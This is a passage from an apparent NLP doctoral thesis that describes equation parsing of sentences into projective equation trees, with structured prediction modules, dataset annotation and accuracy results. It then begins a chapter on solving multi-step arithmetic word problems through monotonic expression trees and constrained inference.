be multiple valid trigger lists. In our example, we could have chosen both variable triggers to point to the same mention “a number”. Quantity triggers in the trigger list form the quantity trigger list, and the variable triggers in trigger list form the variable trigger list. Notation Definition Quantity Trigger Mention of a quantity in text Variable Trigger Noun phrase coupled with variable label Trigger Quantity or variable trigger Quantity Trigger List List of quantity triggers, one for each number mention in equation Variable Trigger List List of variable triggers, one for each variable mention in equation Trigger List Union of quantity and variable trigger list Equation Tree Binary tree representation of equation lc(n), rc(n) Left and right child of node n Expr(n) Expression represented by node n �(n) Operation at node n Order(n) Order of operation at node n Location(n) Character offset of trigger representing leaf node n Span-Start(n), Span-End(n) Start and end character offsets of span covered by node n Table 5.2: Summary of notations used in this chapter Equation Tree An equation tree of a sentence x is a binary tree whose leaves constitute the trigger list of x, and internal nodes (except the root) are labeled with one of the following operations – addition, subtraction, multiplication, division. In addition, for nodes which are labeled with subtraction or division, we maintain a separate variable to determine order of its children. The root of the tree is always labeled with the operation equal. An equation tree is a natural representation for an equation. Each node n in an equation tree represents an expression Expr(n), and the label of the parent node determines how the expressions of its children are to be composed to construct its own expression. Let us denote the label for a non-leaf node n to be �(n), where �(n) ∈ {+,−,×,÷, =} and the order of a node n’s children by Order(n) (defined only for subtraction and division nodes), which takes values lr (Left-Right) or rl (Right-Left). For a leaf node n, 39 the expression Expr(n) represents the variable label, if n is a variable trigger, and the numeric value of the quantity, if it is a quantity trigger. Finally, we use lc(n) and rc(n) to represent the left and right child of node n, respectively. The equation represented by the tree can be generated as follows. For all non-leaf nodes n, we have Expr(n) =   Expr(lc(n))�(n) Expr(rc(n)) if �(n) ∈{+,×, =} Expr(lc(n))�(n) Expr(rc(n)) if �(n) ∈{−,÷}∧Order(n) = lr Expr(rc(n))�(n) Expr(lc(n)) if �(n) ∈{−,÷}∧Order(n) = rl (5.1) Given an equation tree T of a sentence, the equation represented by it is the expression generated by the root of T (following Equation 5.1). Referring to the equation tree in Fig 5.1, the node marked “−r” represents (3 ×V1) − 25, and the root represents the full equation 2 ×V1 = (3 ×V1) − 25. 5.4 Projectivity For each leaf n of an equation tree T , we define a function Location(·), to indicate the position of the corresponding trigger in text. We also define for each node n of equation tree T , functions Span-Start(n) and Span-End(n) to denote the minimum span of text containing the leaves of the subtree rooted at n. We define them as follows: Span-Start(n) =   Location(n) if n is a leaf min(Span-Start(lc(n)),Span-Start(rc(n))) otherwise Span-End(n) =   Location(n) if n is a leaf max(Span-End(lc(n)),Span-End(rc(n))) otherwise An equation tree T is called projective iff for every node n of T , either Span-End(lc(n)) ≤ Span-Start(rc(n)) or Span-End(rc(n)) ≤ Span-Start(lc(n)). In other words, the span of the left child and the right child cannot intersect in a projective equation tree2. The key observation, as our corpus analysis indicates, is that for most sentences, there exists a trigger list, such that the equation tree representing the relation in the sentence is projective. However this might 2This is more general than the definition of projective trees used in dependency parsing [McDonald et al., 2005]. 40 involve mapping two mentions of the same variable to different noun phrases. Figure 5.1 shows an example of a projective equation tree, which requires different mentions of V1 to be mapped to different noun phrases. If we had mapped both mentions of V1 to same noun phrase “a number”, the resulting equation tree would not have been projective. We collected 385 sentences which represent an equation with one or two mentions of variables, and each number in the sentence used at most once in the equation. We found that only one sentence among these could not generate a projective equation tree. (See Section 5.6.1 for details on dataset creation). Therefore, we develop an algorithmic approach for predicting projective equation trees, and show empirically that it compares favorably with ones which do not make the projective assumption. 5.5 Predicting Equation Parse Equation parsing of a sentence involves predicting three components – Quantity Trigger List, Variable Trigger List and Equation Tree. We develop three structured prediction modules to predict each of the above components. All our prediction modules take a similar form: given input x and output y, we learn a scoring function fw(x,y), which scores how likely is the output y given input x. The scoring function fw(x,y) is linear, fw(y) = w T φ(x,y), where φ(x,y) is a feature vector extracted from x and y. The inference problem, that is, the prediction y∗ for an input x is then: y∗ = arg maxy∈Y fw(y), where Y is the set of all allowed values of y. 5.5.1 Predicting Quantity Trigger List Given input text and the quantities mentioned in it, the role of this step is to identify , for each quantity in the text, whether it should be part of the final equation. For instance, in example 5.5 in Section 5.1, both “5” and “10” are not relevant for the final equation “V1 + V2 = 54”. Similarly, in example 5.4, the number “two” is irrelevant for the equation “V1 + V2 = 80”. We define for each quantity q in the sentence, a boolean value Relevance(q), which is set to true if q is relevant for the final equation, and to false otherwise. For the structured classification, the input x is the sentence along with a set of recognized quantities mentioned in it, and the output y is the relevance values for all quantities in the sentence. We empirically found that predicting all relevance values jointly performs better than having a binary classifier predict each one separately. The feature function φ(x,y) used for the classification generates the following features : 41 1. Neighborhood features : For each quantity q in the input sentence, we add unigrams and bigrams generated from a window around q, part of speech tags of neighborhood tokens of q. We conjoin these features with Relevance(q). 2. Quantity Features : For each quantity q, we add unigrams and bigrams of the phrase representing the quantity. Also, we add a feature indicating whether the number is associated with number one or two, and whether it is the only number present in the sentence. These features are also conjoined with Relevance(q). 5.5.2 Predicting Variable Trigger List The goal of this step is to predict the variable trigger list for the equation. Our structured classifier takes as input the sentence x, and the output y is either one or two noun-phrases, representing variables in the final equation. As we pointed out earlier, multiple groundings might be valid for any given variable, hence there can be multiple valid variable trigger lists. For every sentence x, we construct a set Y of valid outputs. Each element in Y corresponds to a valid variable trigger list. Finally, we aim to output only one of the elements of Y . We modified the standard structured prediction algorithm to consider “superset supervision” and take into account multiple gold structures for an input x. We assume access to N training examples of the form : (x1,Y1), (x2,Y2), . . . , (xN,YN ), where each Yi is a set of valid outputs for the sentence xi. Since we want to output only one variable trigger list, we want to score at least one y from Yi higher than all other possible outputs, for each xi. We use a modified latent structured SVM to learn the weight vector w. The algorithm treats the best choice among all of Yi as a latent variable. At each iteration, for all xi, the algorithm chooses the best choice y∗i from the set Yi, according to the weight vector w. Then, w is updated by learning on all (xi,y ∗ i ) by a standard structured SVM algorithm. The details of the algorithm are in Algorithm 4. 42 Algorithm 4 Structural SVM with Superset Supervision Input: Training data T = {(x1,Y1), (x2,Y2), . . . , (xN,YN )} Output: Trained weight vector w 1: w ← w0 2: repeat 3: T ′ ←∅ 4: for all (xi,Yi) ∈ T do 5: y∗i ← arg maxy∈Yi wT φ(xi,y) 6: T ′ ← T ′ ∪{(xi,y∗i )} 7: end for 8: Update w by running standard Structural SVM algorithm on T ′ 9: until convergence 10: return w The distinction from standard latent structural SVM is in line 5 of Algorithm 4. In order to get the best choice y∗i for input xi, we search only inside Yi, instead of all of Y. A similar formulation can be found in [Björkelund and Kuhn, 2014]. The features φ(x,y) used for variable trigger prediction are as follows: 1. Variable features : Unigrams and bigrams generated from the noun phrase representing variables, part of speech tags of tokens in noun phrase representing variables. 2. Neighborhood Features : Unigrams and POS tags from neighborhood of variables. All the above features are conjoined with two labels, one denoting whether y has two variables or one, and the second denoting whether y has two variables represented by the same noun phrase. If the output of the classifier is a pair of noun phrases, we use a rule based variable coreference detector, to determine whether both noun phrases should have the same variable label or not. The rules for variable coreference are as follows : 1. If both noun phrases are the same, and they do not have the token “two” or “2”, they have the same label. 2. If the noun phrases are different, and the noun phrase appearing later in the sentence contains tokens “itself”, “the same number”, they have the same label. 3. In all other cases, they have different labels. 43 Finally, each noun phrase contributes one variable trigger to the variable trigger list. 5.5.3 Predicting Equation Tree It is natural to assume that the syntactic parse of the sentence could be very useful in addressing all the predictions we are making in the equation parsing tasks. However, it turns out that this is not the case – large portions of the syntactic parse will not be part of the equation parse, hence we need the aforementioned modules to address this. Nevertheless, in the next task of predicting the equation tree, we attempted to constraint the output space using guidance from the syntactic tree; we found, though, that even enforcing this weak level of output expectation is not productive. This was due to the poor performance of current syntactic parsers on the equation data (eg., in 32% of sentences, the Stanford parser made a mistake which does not allow recovering the correct equation). The tree prediction module receives the trigger list predicted by the previous two modules, and the goal is to create an equation tree using the trigger list as the leaves of that tree. The input x is the sentence and the trigger list, and the output y is the equation tree representing the relation described in the sentence. We assume that the output will be a projective equation tree. For features φ(x,y), we extract for each non-leaf node n of the equation tree y, the following: 1. Neighborhood Features : Unigrams, bigrams and POS tags from neighborhood of Span-Start(lc(n)), Span-Start(rc(n)), Span-End(lc(n)) and Span-End(rc(n)), conjoined with �(n) and Order(n). 2. Connecting Text Features : Unigrams, bigrams and part of speech tags between min(Span-End(lc(n)),Span-End(rc(n))) and max(Span-Start(lc(n)), Span-Start(rc(n))), conjoined with �(n) and Order(n). 3. Number Features : In case we are combining two leaf nodes representing quantity triggers, we add a feature signifying whether one number is larger than the other. The projectivity assumption implies that the final equation tree can be generated by combining only adjacent nodes, once the set of leaves is sorted based on Span-Start(·) values. This allows us to use CKY algorithm for inference. A natural approach to further reduce the output space is to conform to the projective structure of the syntactic parse of the sentence. However, we found this to adversely affect performance, due to the poor performance of syntactic parser on equation data. 44 Lexicon To bootstrap the equation parsing process, we developed a high precision lexicon to translate mathematical expressions to operations and orders, like “sum of A and B” translates to “A+B”, “A minus B” translates to “A-B”, etc. (where A and B denote placeholder numbers or expressions). At each step of CKY, while constructing a node n of the equation tree, we check for a lexicon text expression corresponding to node n. If found, we allow only the corresponding operation (and order) for node n, and do not explore other operations or orders. We show empirically that reducing the space using this greedy lexicon matching help improve performance. We found that using the lexicon rules as features instead of hard constraints do not help as much. Note that our lexicon comprises only generic math concepts, and around 50% of the sentences in our dataset do not contain any pattern from the lexicon. Details of the lexicon are added to the appendix. Finally, given input sentence, we first predict the quantity trigger and the variable trigger lists. Given the complete trigger list, we predict the equation tree relating the components of the trigger list. 5.5.4 Alternatives A natural approach could be to jointly learn to predict all three components, to capture the dependencies among them. To investigate this, we developed a structured SVM which predicts all components jointly, using the union of the features of each component. We use approximate inference, first enumerating possible trigger lists, and then equation trees, and find the best scoring structure. However, this method did not outperform the pipeline method. The worse performance of joint learning is due to: (1) search space being too large for the joint model to do well given our dataset size of 385, and (2) our independent classifiers being good enough, thus supporting better joint inference. This tradeoff is strongly supported in the literature [Punyakanok et al., 2005b, Sutton and McCallum, 2007]. Another option is to enforce constraints between trigger list predictions, such as, variable triggers should not overlap with the quantity triggers. However, we noticed that often noun phrases returned by the Stanford parser were noisy, and would include neighboring numbers within the extracted noun phrases. This prevented us from enforcing such constraints. 5.6 Experimental Results We now describe the data set, and the annotation procedure used. We then evaluate the system’s performance on predicting trigger list, equation tree, and the complete equation parse. 45 5.6.1 Dataset We created a new dataset consisting of 385 sentences extracted from algebra word problems and financial news headlines. For algebra word problems, we used the MIT dataset [Kushman et al., 2014], and two high school mathematics textbooks, Elementary Algebra (College of Redwoods) and Beginning and Intermediate Algebra (Tyler Wallace). Financial news headlines were extracted from The Latest News feed of MarketWatch, over the month of February, 2015. All sentences with information describing a mathematical relation among at most two (possibly coreferent) variables, were chosen. Next, we pruned sentences which require multiple uses of a number to create the equation. This only removed a few time related sentences like “In 10 years, John will be twice as old as his son.”. We empirically found that around 97% of sentences describing a relation fall under the scope of our dataset. Some statistics of the dataset are provided in Table 5.3. Source #Sentences MIT 245 Redwoods 25 Wallace 40 MarketWatch 75 Table 5.3: Statistics of dataset The annotators were shown each sentence paired with the normalized equation representing the relation in the sentence. For each variable in the equation, the annotators were asked to mark spans of text which best describe what the variable represents. They were asked to annotate associated entities if exact variable description was not present. For instance, in example 5.3 (Section 1), the relation holds between the speed of bird and the speed of wind. However, “speed” is not explicitly mentioned in the sentence. In such cases, the annotators were asked to annotate the associated entities “the wind” and “a bird” as representing variables. The guidelines also directed annotators to choose the longest possible mention, in case they feel the mention boundary is ambiguous. As a result, in the sentence, “City Rentals rent an intermediate-size car for 18.95 dollars plus 0.21 per mile.”, the phrase “City Rentals rent an intermediate-size car” was annotated as representing variable. We allow multiple mentions to be annotated for the same variable. In example 5.2 (Section 1), both “a number” and “the same number” were annotated as representing the same variable. We wanted to consider only noun phrase constituents for variable grounding. Therefore, for each anno- tated span, we extracted the noun phrase with maximum overlap with the span, and used it to represent the variables. Finally, a tuple with each variable being mapped to one of the noun phrases representing it, 46 forms a valid output grounding (variable trigger list). We computed inter-annotator agreement on the final annotations where only noun phrases represent variables. The agreement (kappa) was 0.668, indicating good agreement. The average number of mention annotations per sentence was 1.74. 5.6.2 Equation Parsing Modules In this section, we evaluate the performance of the individual modules of the equation parsing process. We report Accuracy - the fraction of correct predictions. Tables 5.4, 5.5 and 5.6 show the 5-fold cross validation accuracy of the various modules. In each case, we also report accuracy by removing each feature group, one at a time. In addition, for equation tree prediction, we also show the effect of lexicon, projectivity, conforming to syntactic parse constraints, and using lexicon as features instead of hard constraints. For all our experiments, we use the Stanford Parser [Chen and Manning, 2014], the Illinois POS tagger [Roth and Zelenko, 1998], the Illinois shallow parser [Punyakanok and Roth, 2001] and the Illinois-SL structured prediction package [Chang et al., 2015]. Accuracy All features 95.3 No Neighborhood features 42.5 No Quantity features 93.2 Table 5.4: Performance of Quantity Trigger List Prediction Accuracy All features 75.5 No Variable features 58.6 No Neighborhood features 70.3 Table 5.5: Performance of Variable Trigger List Prediction 47 Accuracy All features 78.9 No Neighborhood features 64.3 No Connecting Text features 70.2 No Number features 77.6 No Lexicon 72.7 No Projectivity 72.8 Conform with Syntactic Parse 70.2 Lexicon as Features 74.5 Table 5.6: Performance of Equation Tree Prediction 5.6.3 Equation Parsing Results In this section, we evaluate the performance of our system on the overall equation parsing task. We report Equation Accuracy - the fraction of sentences for which the system got the equation correct, and Equa- tion+Grounding Accuracy - the fraction of sentences for which the system got both the equation and the grounding of variables correct. Table 5.7 shows the overall performance of our system, on a 5-fold cross validation. We compare against Joint Learning - a system which jointly learns to predict all relevant com- ponents of an equation parse (Section 5.5.4). We also compare with SPF [Artzi and Zettlemoyer, 2013], a publicly available semantic parser, which can learn from sentence-logical form pairs. We train SPF with sentence-equation pairs and a seed lexicon for mathematical terms (similar to ours), and report equation accuracy. Our structured predictors pipeline approach is shown to be superior to both Joint Learning and SPF. Source Equation Accuracy Equation + Grounding Accuracy Our System 71.3 ± 3.7 61.2 ± 5.4 Joint Learning 60.9 ± 9.1 50.0 ± 5.7 SPF 3.1 N/A Table 5.7: Performance on equation parsing 48 SPF gets only a few sentences correct. We attribute this to the inability of SPF to handle overlapping mentions (like in Example 5.4), as well as its approach of parsing the whole sentence to the final output form. The developers of SPF also confirmed 3 that it is not suitable for equation parsing and that these results are expected. Since equation parsing is a more involved process, a slight adaptation of SPF does not seem possible, necessitating a more involved process , of the type we propose. Our approach, in contrast to SPF, can handle overlapping mentions, selects triggers from text, and parses the trigger list to form equations. 5.6.4 Error Analysis For variable trigger list prediction, around 25% of the errors were due to the predictor choosing a span which is contained within the correct span, e.g., when the target noun phrase is “The cost of a child’s ticket”, our predictor chose only “child’s ticket”. Although this choice might be sufficient for downstream tasks, we consider it to be incorrect in our current evaluation. Another 25% of the errors were due to selection of entities which do not participate in the relation. For example, in “A rancher raises 5 times as many cows as horses.”, our predictor chose “A rancher” and “cows” as variables, whereas the relation exists between “cows” and “horses”. For the prediction of the equation tree, we found that 35% of the errors were due to rare math concepts expressed in text. For example, “7 dollars short of the price” represents 7 dollars should be subtracted from the price. These errors can be handled by carefully augmenting the lexicon. Another 15% of the errors were due to lack of world knowledge, requiring understanding of time, speed, and distance. 5.7 Conclusion In this chapter, we investigate methods that identify and understand mathematical relations expressed in text. We introduce the equation parsing task, which involves generating an equation from a sentence and identifying what the variables represent. We define the notion of projectivity, and construct a high precision lexicon, and use these to reduce the equation search space. Our experimental results are quite satisfying and raise a few interesting issues. In particular, it suggests that predicting equation parses using a pipeline of structured predictors performs better than jointly trained alternatives. As discussed, it also points out the limitation of the current NLP tools in supporting these tasks. Code and dataset are available at http://cogcomp.cs.illinois.edu/page/publication_view/800. 3Private communication 49 http://cogcomp.cs.illinois.edu/page/publication_view/800 Chapter 6 Arithmetic Word Problems 6.1 Introduction In this chapter, we expand our focus on quantitative reasoning over multiple numbers mentioned across different sentences. As a test bed, we choose the task of automatically solving arithmetic word problems. We found these problems to be a good abstraction of the challenges faced in quantitative reasoning across multiple sentences. Word problems arise naturally when reading the financial section of a newspaper, or following election coverage. These problems pose an interesting challenge to the NLP community, due to its concise and relatively straightforward text, and seemingly simple semantics. Arithmetic word problems are usually directed towards elementary school students, and can be solved by combining the numbers mentioned in text with basic operations (addition, subtraction, multiplication, division). They are simpler than algebra word problems which require students to identify variables, and form equations with these variables to solve the problem. Initial methods to address arithmetic word problems have mostly focused on subsets of problems, re- stricting the number or the type of operations used [Roy et al., 2015, Hosseini et al., 2014] but could not deal with multi-step arithmetic problems involving all four basic operations. The template based method of [Kushman et al., 2014], on the other hand, can deal with all types of problems, but implicitly assumes that the solution is generated from a set of predefined equation templates. In this chapter, we present a novel approach which can solve a general class of arithmetic problems without predefined equation templates. In particular, it can handle multiple step arithmetic problems as shown in Example 6.1. 50 Example 6.1 Gwen was organizing her book case making sure each of the shelves had exactly 9 books on it. She has 2 types of books - mystery books and picture books. If she had 3 shelves of mystery books and 5 shelves of picture books, how many books did she have in total? The solution involves understanding that the number of shelves needs to be summed up, and that the total number of shelves needs to be multiplied by the number of books each shelf can hold. In addition, one has to understand that the number “2” is not a direct part of the solution of the problem. While a solution to these problems eventually requires composing multi-step numeric expressions from text, we believe that directly predicting this complex expression from text is not feasible. At the heart of our technical approach is the novel notion of an Expression Tree. We show that the arithmetic expressions we are interested in can always be represented using an Expression Tree that has some unique decomposition properties. This allows us to decompose the problem of mapping the text to the arithmetic expression to a collection of simple prediction problems, each determining the lowest common ancestor operation between a pair of quantities mentioned in the problem. We then formulate the decision problem of composing the final expression tree as a joint inference problem, via an objective function that consists of all these decomposed prediction problems, along with legitimacy and background knowledge constraints. Learning to generate the simpler decomposed expressions allows us to support effectively support quan- titative reasoning over multiple numbers, and allows generalization across problems types. In particular, our system could solve Example 6.1 even though it has never seen a problem that requires both addition and multiplication operations. We also introduce a second concept, that of quantity schema, that allows us to focus on the information relevant to each quantity mentioned in the text. We show that features extracted from quantity schemas help reasoning effectively about the solution. Moreover, quantity schemas help identify unnecessary text snippets in the problem text. For instance, in Example 6.2, the information that “Tom washed cars over the weekend” is irrelevant; he could have performed any activity to earn money. In order to solve the problem, we only need to know that he had $76 last week, and now he has $86. 51 Example 6.2 Last week Tom had $74. He washed cars over the weekend and now has $86. How much money did he make from the job? We combine the classifiers’ decisions using a constrained inference framework that allows for incorporating world knowledge as constraints. For example, we deliberatively incorporate the information that, if the problems asks about an “amount”, the answer must be positive, and if the question starts with “how many”, the answer will most likely be an integer. Our system is evaluated on two existing datasets of arithmetic word problems, achieving state of the art performance on both. We also create a new dataset of multistep arithmetic problems, and show that our system achieves competitive performance in this challenging evaluation setting. The next section describes the related work in the area of automated math word problem solving. We then present the theory of expression trees and our decomposition strategy that is based on it. Sec. 4 presents the overall computational approach, including the way we use quantity schemas to learn the mapping from text to expression tree components. Finally, we discuss our experimental study and conclude. 6.2 Related Work Work in automated arithmetic problem solvers has focused on a restricted subset of problems. The system described in [Hosseini et al., 2014, Mitra and Baral, 2016] handles only addition and subtraction problems, and requires additional annotated data for verb categories. In contrast, our system does not require any addi- tional annotations and can handle a more general category of problems. The approach in [Roy et al., 2015] supports all four basic operations, and uses a pipeline of classifiers to predict different properties of the problem. However, it makes assumptions on the number of quantities mentioned in the problem text, as well as the number of arithmetic steps required to solve the problem. In contrast, our system does not have any such restrictions, effectively handling problems mentioning multiple quantities and requiring multiple steps. Kushman’s approach to automatically solving algebra word problems [Kushman et al., 2014] might be the most related to ours. It tries to map numbers from the problem text to predefined equation templates. However, they implicitly assume that similar equation forms have been seen in the training data. In contrast, our system can perform competitively, even when it has never seen similar expressions in training. There is a recent interest in understanding text for the purpose of solving scientific and quantitative 52 problems of various kinds. Our approach is related to work in understanding and solving elementary school standardized tests [Clark, 2015]. The system described in [Berant et al., 2014] attempts to automatically answer biology questions, by extracting the structure of biological processes from text. There has also been efforts to solve geometry questions by jointly understanding diagrams and associated text [Seo et al., 2014]. Our constrained inference module falls under the general framework of Constrained Conditional Models (CCM) [Chang et al., 2012]. In particular, we use the L+I scheme of CCMs, which predicts structured out- put by independently learning several simple components, combining them at inference time. This has been successfully used to incorporate world knowledge at inference time, as well as getting around the need for large amounts of jointly annotated data for structured prediction [Roth and Yih, 2005, Punyakanok et al., 2005a, Punyakanok et al., 2008, Clarke and Lapata, 2006, Barzilay and Lapata, 2006, Roy et al., 2015]. 6.3 Expression Tree and Problem Decomposition We address the problem of automatically solving arithmetic word problems. The input to our system is the problem text P , which mentions n quantities q1,q2, . . . ,qn. Our goal is to map this problem to a read- once arithmetic expression E that, when evaluated, provides the problem’s solution. We define a read-once arithmetic expression as one that makes use of each quantity at most once. We say that E is a valid expression, if it is such a Read-Once arithmetic expression, and we only consider in this work problems that can be solved using valid expressions (it’s possible that they can be solved also with invalid expressions). An expression tree T for a valid expression E is a binary tree whose leaves represent quantities, and each internal node represents one of the four basic operations. For a non-leaf node n, we represent the operation associated with it as �(n), and its left and right child as lc(n) and rc(n) respectively. The numeric value of the quantity associated with a leaf node n is denoted as Q(n). Each node n also has a value associated with it, represented as Val(n), which can be computed in a recursive way as follows: Val(n) =   Q(n) if n is a leaf Val(lc(n))�(n) Val(rc(n)) otherwise (6.1) For any expression tree T for expression E with root node nroot, the value of Val(nroot) is exactly equal to the numeric value of the expression E. Therefore, this gives a natural representation of numeric expressions, providing a natural parenthesization of the numeric expression. Fig 6.1 shows an example of an arithmetic 53 problem with solution expression and an expression tree for the solution expression. Problem Gwen was organizing her book case making sure each of the shelves had exactly 9 books on it. She has 2 types of books - mystery books and picture books. If she had 3 shelves of mystery books and 5 shelves of picture books, how many books did she have total? Solution (3 + 5) × 9 = 72 Expression Tree of Solution 3 + 5 × 9 Figure 6.1: An arithmetic word problem, solution expression and the corresponding expression tree Definition An expression tree T for a valid expression E is called monotonic if it satisfies the following conditions: 1. If an addition node is connected to a subtraction node, then the subtraction node is the parent. 2. If a multiplication node is connected to a division node, then the division node is the parent. 3. Two subtraction nodes cannot be connected to each other. 4. Two division nodes cannot be connected to each other. Fig 6.2 shows two different expression trees for the same expression. Fig 6.2b is monotonic whereas fig 6.2a is not. Our decomposition relies on the idea of monotonic expression trees. We try to predict for each pair of quantities qi,qj, the operation at the lowest common ancestor (LCA) node of the monotonic expression tree for the solution expression. We also predict for each quantity, whether it is relevant to the solution. Finally, an inference module combines all these predictions. 54 3 + 5 − 9 7 8 × + (a) 3 + 5 − 97 8× + (b) Figure 6.2: Two different expression trees for the numeric expression (3 × 5) + 7 − 8 − 9. The right one is monotonic, whereas the left one is not. In the rest of the section, we show that for any pair of quantities qi,qj in the solution expression, any monotonic tree for the solution expression has the same LCA operation. Therefore, predicting the LCA operation becomes a multiclass classification problem. The reason that we consider the monotonic representation of the expression tree is that different trees could otherwise give different LCA operation for a given pair of quantities. For example, in Fig 6.2, the LCA operation for quantities 5 and 8 can be + or −, depending on which tree is considered. Definition We define an addition-subtraction chain of an expression tree to be the maximal connected set of nodes labeled with addition or subtraction. The nodes of an addition-subtraction (AS) chain C represent a set of terms being added or subtracted. These terms are sub-expressions created by subtrees rooted at neighboring nodes of the chain. We call these terms the chain terms of C, and the whole expression, after node operations have been applied to the chain terms, the chain expression of C. For example, in fig 6.2, the shaded nodes form an addition-subtraction chain. The chain expression is (3 × 5) + 7 − 8 − 9, and the chain terms are 3 × 5, 7, 8 and 9. We define a multiplication-division (MD) chain in a similar way. Theorem 6.3.1. Every valid expression can be represented by a monotonic expression tree. Proof. The proof is procedural, that is, we provide a method to convert any expression tree to a monotonic expression tree for the same expression. Consider a non-monotonic expression tree E, and without loss of generality, assume that the first condition for monotonicity is not valid. Therefore, there exists an addition node ni and a subtraction node nj, and ni is the parent of nj. Consider an addition-subtraction chain C which includes ni,nj. We now replace the nodes of C and its subtrees in the following way. We add a single subtraction node n−. The left subtree of n− has all the addition chain terms connected by addition nodes, 55 and the right subtree of n− has all the subtraction chain terms connected by addition nodes. Both subtrees of n− only require addition nodes, hence monotonicity condition is satisfied. We can construct the monotonic tree in Fig 6.2b from the non-monotonic tree of Fig 6.2a using this procedure. The addition chain terms are 3 × 5 and 7, and the subtraction chain terms are 8 and 9. As as was described above, we introduce the root subtraction node in Fig 6.2b and attach the addition chain terms to the left and the subtraction chain terms to the right. The same line of reasoning can be used to handle the second condition with multiplication and division replacing addition and subtraction, respectively. Theorem 6.3.2. Consider two valid expression trees T 1 and T 2 for the same expression E. Let C1, C2 be the chain containing the root nodes of T 1 and T2 respectively. The chain type (addition-subtraction or multiplication-division) as well as the the set of chain terms of C1 and C2 are identical. Proof. We first prove that the chains containing the roots are both AS or both MD, and then show that the chain terms are also identical. We prove by contradiction that the chain type is same. Let C1’s type be “addition-subtraction” and C2’s type be “multiplication-division” (without loss of generality). Since both C1 and C2 generate the same expression E, we have that E can be represented as sum (or difference) of two expressions as well as product(or division) of two expressions. Transforming a sum (or difference) of expressions to a product (or division) requires taking common terms from the expressions, which imply that the sum (or difference) had duplicate quantities. The opposite transformation adds same term to various expressions leading to multiple uses of the same quantity. Therefore, this will force at least one of C1 and C2 to use the same quantity more than once, violating validity. We now need to show that individual chain terms are also identical. Without loss of generality, let us assume that both C1 and C2 are “addition-subtraction” chains. Suppose the chain terms of C1 and C2 are not identical. The chain expression for both the chains will be the same (since they are root chains, the chain expressions has to be the same as E). Let the chain expression for C1 be ∑ i ti − ∑ i t ′ i, where ti’s are the addition chain terms and t′i are the subtraction chain terms. Similarly, let the chain expression for C2 be ∑ i si − ∑ i s ′ i. We know that ∑ i ti − ∑ i t ′ i = ∑ i si − ∑ i s ′ i, but the set of ti’s and t ′ i’s is not the same as the set of si and s ′ i’s. However it should be possible to transform one form to the other using mathematical manipulations. This transformation will involve taking common terms, or multiplying two terms, or both. Following previous explanation, this will force one of the expressions to have duplicate quantities, violating validity. Hence, the chain terms of C1 and C2 are identical. 56 Consider an expression tree T for a valid expression E. For a distinct pair of quantities qi,qj participating in expression E, we denote by ni,nj the leaves of the expression tree T representing qi,qj, respectively. Let nLCA(qi,qj;T ) to be the lowest common ancestor node of ni and nj. We also define order(qi,qj;T ) to be true if ni appears in the left subtree of nLCA(qi,qj;T ) and nj appears in the right subtree of nLCA(qi,qj;T ) and set order(qi,qj;T ) to false otherwise. Finally we define �LCA(qi,qj;T ) for a pair of quantities qi,qj as follows : �LCA(qi,qj,T ) =   + if �(nLCA(qi,qj;T )) = + × if �(nLCA(qi,qj;T )) = × − if �(nLCA(qi,qj;T )) = − and order(qi,qj;T ) = true −reverse if �(nLCA(qi,qj;T )) = − and order(qi,qj;T ) = false ÷ if �(nLCA(qi,qj;T )) = ÷ and order(qi,qj;T ) = true ÷reverse if �(nLCA(qi,qj;T )) = ÷ and order(qi,qj;T ) = false (6.2) Definition Given two expression trees T 1 and T 2 for the same expression E, T 1 is LCA-equivalent to T 2 if for every pair quantities qi,qj in the expression E, we have �LCA(qi,qj,T 1) = �LCA(qi,qj,T 2). Theorem 6.3.3. All monotonic expression trees for an expression are LCA-equivalent to each other. Proof. We prove by induction on the number of quantities used in an expression. For all expressions E with 2 quantities, there exists only one monotonic expression tree, and hence, the statement is trivially true. This satisfies our base case. For the inductive case, we assume that for all expressions with k < n quantities, the theorem is true. Now, we need to prove that any expression with n nodes will also satisfy the property. Consider a valid (as in all cases) expression E, with monotonic expression trees T 1 and T 2. From theorem 6.3.2, we know that the chains containing the roots of T 1 and T 2 have identical type and terms. Given two quantities qi,qj of E, the lowest common ancestor of both T 1 and T 2 will either both belong to the chain containing the root, or both belong to one of the chain terms. If the LCA node is part of the chain for both T 1 and T 2, monotonic property ensures that the LCA operation will be identical. If the LCA node is part of a chain term (which is an expression tree of size less than n), the property is satisfied by induction hypothesis. 57 The theory just presented suggests that it is possible to uniquely decompose the overall problem to simpler steps and this will be exploited in the next section. 6.4 Mapping Problems to Expression Trees Given the uniqueness properties proved in Sec. 6.3, it is sufficient to identify the operation between any two relevant quantities in the text, in order to determine the unique valid expression. In fact, identifying the operation between any pair of quantities provides much needed redundancy given the uncertainty in identifying the operation from text, and we exploit it in our final joint inference. Consequently, our overall method proceeds as follows: given the problem text P , we detect quantities q1,q2, . . . ,qn. We then use two classifiers, one for relevance and other to predict the LCA operations for a monotonic expression tree of the solution. Our training makes use of the notion of quantity schemas, which we describe in Section 6.4.2. The distributional output of these classifiers is then used in a joint inference procedure that determines the final expression tree. Our training data consists of problem text paired with a monotonic expression tree for the solution expression and alignment of quantities in the expression to quantity mentions in the problem text. Both the relevance and LCA operation classifiers are trained on gold annotations. 6.4.1 Global Inference for Expression Trees In this subsection, we define the scoring functions corresponding to the decomposed problems, and show how we combine these scores to perform global inference. For a problem P with quantities q1,q2, . . . ,qn, we define the following scoring functions: 1. Pair(qi,qj,op) : Scores the likelihood of �LCA(qi,qj,T ) = op, where T is a monotone expression tree of the solution expression of P . A multiclass classifier trained to predict LCA operations (Section 6.4.4) can provide these scores. 2. Irr(q) : Scores the likelihood of quantity q being an irrelevant quantity in P , that is, q is not used in creating the solution. A binary classifier trained to predict whether a quantity q is relevant or not (Section 6.4.3), can provide these scores. 58 For an expression E, let I(E) be the set of all quantities in P which are not used in expression E. Let T be a monotonic expression tree for E. We define Score(E) of an expression E in terms of the above scoring functions and a scaling parameter wIrr as follows: Score(E) =wIrr ∑ q∈I(E) Irr(q) + ∑ qi,qj /∈I(E) Pair(qi,qj,�LCA(qi,qj,T )) (6.3) Our final expression tree is an outcome of a constrained optimization process, following [Roth and Yih, 2004, Chang et al., 2012]. Our objective function makes use of the scores returned by Irr(·) and Pair(·) to deter- mine the expression tree and is constrained by legitimacy and background knowledge constraints, detailed below. 1. Positive Answer: Most arithmetic problems asking for amounts or number of objects usually have a positive number as an answer. Therefore, while searching for the best scoring expression, we reject expressions generating negative answer. 2. Integral Answer: Problems with questions such as ‘how many” usually expect integral solutions. We only consider integral solutions as legitimate outputs for such problems. Let C be the set of valid expressions that can be formed using the quantities in a problem P , and which satisfy the above 